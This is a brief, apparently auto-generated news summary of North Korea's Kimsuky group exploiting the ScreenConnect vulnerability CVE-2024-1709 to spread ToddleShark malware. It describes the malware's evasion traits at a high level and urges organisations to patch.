March 5, 2024 at 03:02PM
North Korean hackers exploit ConnectWise’s ScreenConnect software vulnerability with ToddleShark malware. Kimsuky, a DPRK-based APT, targets organizations using the CVE-2024-1709 bug. ToddleShark gathers system info and sends it to attacker-controlled servers via encrypted channels. It evades detection through randomization and junk code. Organizations are urged to patch their systems promptly. More info on ConnectWise’s website.
Based on the meeting notes, the key takeaways are:
1. North Korean hackers are exploiting a critical vulnerability (CVE-2024-1709) in ConnectWise’s ScreenConnect software to spread a new, shapeshifting espionage malware called ToddleShark.
2. Kimsuky (aka APT43), the advanced persistent threat (APT) from North Korea, is using ToddleShark to gather system information, evade detection through randomization algorithms, and execute through legitimate Microsoft binary MSHTA.
3. Traditional detection methods like blocklisting are not effective against ToddleShark due to the use of randomization algorithms and unique hashes.
4. Organizations are urged to patch ScreenConnect applications immediately to prevent exploitation of the CVE-2024-1709 vulnerability. Additional resources for ConnectWise customers are available on the vendor’s website.
These takeaways highlight the urgent need for organizations to update and patch their ConnectWise applications to protect against the growing threat from ToddleShark and similar espionage activities.